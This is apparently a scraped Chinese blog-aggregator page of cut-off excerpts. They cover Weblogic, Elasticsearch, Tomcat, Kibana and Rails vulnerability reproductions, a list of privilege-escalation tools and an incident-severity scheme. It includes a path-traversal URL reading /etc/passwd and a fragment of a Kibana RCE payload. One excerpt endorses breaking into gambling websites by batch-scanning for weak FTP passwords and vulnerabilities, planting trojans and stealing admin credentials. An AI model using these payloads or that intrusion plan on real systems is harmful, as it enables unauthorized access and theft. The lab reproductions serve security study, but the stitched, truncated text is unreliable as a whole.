漏洞

Weblogic复现之任意文件上传

随声附和 提交于 2019-12-01 21:53:13
最近在复现weblogic,今天复现一下其中的任意文件上传漏洞。 漏洞说明 版本 此漏洞涉及版本 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 环境部署 进入该漏洞环境目录 cd vulhub/weblogic/CVE-2018-2094 环境构建 sudo docker-compose build 启动 sudo docker-compose up -d 漏洞复现 前提 访问 http://your-ip:7001/console,即可看到后台登录页面 在CVE-2018-2894环境目录下,查看账号密码,运行以下命令: sudo docker-compose logs | grep password root@localhost:vulhub/weblogic/CVE-2018-2894# docker-compose logs | grep password weblogic_1 | ----> 'weblogic' admin password: ofX5JwIc weblogic_1 | admin password : [ofX5JwIc] weblogic_1 | * password assigned to an admin-level user. For * weblogic_1 | * password assigned to an

Elasticsearch未授权访问漏洞

时间秒杀一切 提交于 2019-12-01 21:28:05
写在前面的话 说出来你们可能不信,我玩ElasticSearch被人勒索了 删了我的数据,还要我支付0.05的比特币 卧槽?以前听说的事居然是真的,还发生到我的头上了 哈哈哈哈哈,于是我果断给这个邮箱回复了一句 言归正传 漏洞描述: ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在未授权访问漏洞。该漏洞导致,攻击者可以拥有Elasticsearch的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。 Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 漏洞评级: 高危 整改建议: 1、为elasticsearch增加登录验证,可以使用官方推荐的shield插件,该插件为收费插件,可试用30天,免费的可以使用elasticsearch-http-basic,searchguard插件

渗透测试

爷,独闯天下 提交于 2019-12-01 20:04:39
渗透测试 1.简介 渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了[漏洞扫描器](https://baike.baidu.com/item/漏洞扫描器/11024468)等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。 ​ 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意 黑客 的攻击方法,来评估 计算机网络系统 安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 ​ 换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。 我们认为渗透测试还具有的两个显著特点是:渗透测试是一个渐进的并且逐步深入的过程

Tomcat RCE 漏洞复现(CVE-2019-0232)

房东的猫 提交于 2019-12-01 19:27:15
https://blog.csdn.net/helloexp/article/details/89377270 漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 来源: https://www.cnblogs.com/vzhangxk/p/11714394.html

Kibana<6.6.0代码执行漏洞复现

孤人 提交于 2019-12-01 19:00:22
更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。 使用docker快速部署环境 docker pull kibana:6.5.4 docker pull elasticsearch:6.5.4 docker run -d --name elasticsearchnew -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4 docker run -d -p 5601:5601 --link elasticsearchnew -e "ELASTICSEARCH_URL=http://192.168.35.185:9200" kibana:6.5.4 参数简单介绍下 -p: 代表指定的宿主机的端口和容器端口的映射 -d: 代表启动该容器后的进程为守护进程的方式运行 -e: 代表设置容器变量 注意 这里其实有个坑 如果你的浏览器访问后出现如下图 那么你是需要确定下 你的kibana与elasticsearch版本是否一致 后面还有个坑 可能是我浏览器缓存的问题 如下图 同样的地址 左侧浏览器正常访问 右侧却出现错误? 大约十分钟后我再次刷新 右侧浏览器已经恢复正常 开始利用 点击timelion 输入如下语句 .es(*).props(label.__proto__.env

Ruby On Rails 路径穿越漏洞(CVE-2018-3760)

一个人想着一个人 提交于 2019-12-01 18:57:51
Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 漏洞复现 直接访问 http://your-ip:3000/assets/file:%2f%2f/etc/passwd ,将会报错,因为文件 /etc/passwd 不在允许的目录中。 我们通过报错页面,可以获得允许的目录列表。随便选择其中一个目录,如 /usr/src/blog/app/assets/images ,然后使用 %252e%252e/ 向上一层跳转,最后读取 /etc/passwd : assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/pa 来源: https://www.cnblogs.com/daiorz/p/11713277.html

K8工具集

半城伤御伤魂 提交于 2019-12-01 18:30:23
K8工具集 比较全,底部有下载网址。 综合工具 [+] 扫描工具 K8Cscan5.3 大型内网渗透扫描器内置27个功能,支持Cobalt Strike [+] 综合工具 K8飞刀Final.rar [+] K8data.mdb K8飞刀漏洞数据库20190402 [+] K8expList.txt K8飞刀漏洞利用列表 提权工具 [+] 提权工具 CVE-2019-0803.exe Win32k漏洞提权工具 [+] 提权工具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户) [+] 提权工具 pr.exe pr有参版 pr0无参版(巴西烤肉:国内10年所说的PR或IIS6提权) [+] 提权工具 k8uac_20181125[K8].rar 目前还支持全版本WIN7-Win10 [+] 提权工具 bypassUAC_Win7_10[K8team].rar 13还是15年?Win10打补丁失效 [+] 提权工具 bypassUACexe_0419[K8].rar 13年的吧 打补丁的WIN7好像不支持了 [+] 提权工具 Lpk提权_K8.rar DLLHijack [+] 提权工具 Usp10提权_K8.rar DLLHijack [+] 提权工具 MS11-046.exe [+] 提权工具 MS11-080.exe [+] 提权工具 MS14-068

黑吃黑,大神实操带你破解菠菜平台

筅森魡賤 提交于 2019-12-01 17:25:49
世界上什么东西也替代不了持之以恒,才华不能够,因为不成功的才子到处都是;天赋也不能够,因为这个世界上到处是受过良好教育的乞丐。惟有正确的方法和持之以恒才是万能的。万法相通,哥哥已经多年没接触黑客技术,但入侵网站的效率反而更胜从前。 入侵思路 1、从H网站获取大量的菠菜网址域名 2、把收集到的域名放到漏洞检测软件里面进行扫描。 3、找到有漏洞平台,植入木马,等待有管理员登陆,获取后台管理员账号密码 4、成功入侵网站后台,接下来你懂的! 一)获取大量菠菜平台域名 众所周知,互联网上黄赌不分家,菠菜平台最喜欢就是到各大“成人学习网站”上打广告,各种亮瞎眼的广告图片背后都藏着不同的平台,所以先从这下手 无论多么严密的系统和安全措施,终究是人在操控,人才是漏洞的根源。 * 弱口令批量入侵 做网站时,先要将网站源码上传到服务器。FTP就是上传源码到服务器的软件,因此只要获得网站的FTP密码,这个网站的所有数据就唾手可得。总会有一些网站的密码非常简单,如上图某网站的密码是123456;通过搜索引擎采集大量黄色网址,然后用软件自动扫描,成千上万个网站中,总会有那么几个网站的密码很简单,因为这些网站可能是某些站长做出来就没去管理过的。 经过一个下午的采集分析,拿到了大概5万个菠菜平台的网址,接下来就是要分析这些网址有没有存在漏洞。 二) 漏洞批量入侵法 哥哥随手搞了下,轻松拿下几万个网站的网址

系统故障等级和故障报告规定

陌路散爱 提交于 2019-12-01 16:38:18
系统故障等级和故障报告规定 原文链接: http://www.cnblogs.com/hyming011/p/8252792.html 可用性 P1 业务中断4小时以上 P2 业务中断2-4小时 P3 业务中断1-2小时,业务核心功能无法使用。 P4 业务中断1小时以内,核心功能受到影响。 P5 业务中断1小时以内,业务次要功能无法使用 安全类 P1 系统入侵:核心业务受到入侵,或者系统文件被恶意篡改,引发入侵扩散 页面篡改:网站首页、应用首页被非法篡改并引起极大危害 CGI漏洞:已经引起大面积的用户讨论、传播和已知侵害公司品牌利益,或者造成直接经济损失的。 P2 系统入侵:核心业务受到入侵但未危及到重要核心数据,仅造成扩散隐患但未发现有以外的机器系统受到入侵。 页面篡改:业务页面被非法篡改或者开发人员的小恶作剧。 CGI漏洞:由外部发现但还没有造成重大危及或者造成经济利益损失的。 P3 系统入侵:核心业务存在高危端口或者系统漏洞 CGI漏洞:由内部发现但还没有造成重大危及或者造成经济利益损失的核心系统漏洞。 P4 系统入侵:非核心业务存在高危端口或者系统漏洞 CGI漏洞:由内部发现但还没有造成重大危及或者造成经济利益损失的普通系统漏洞。 P5 隐患:自身有漏洞但无重大后果。   知会人员 出具故障报告 P1 CTO、对应业务总监&VP 是 P2 技术总监&技术经理 是 P3 主管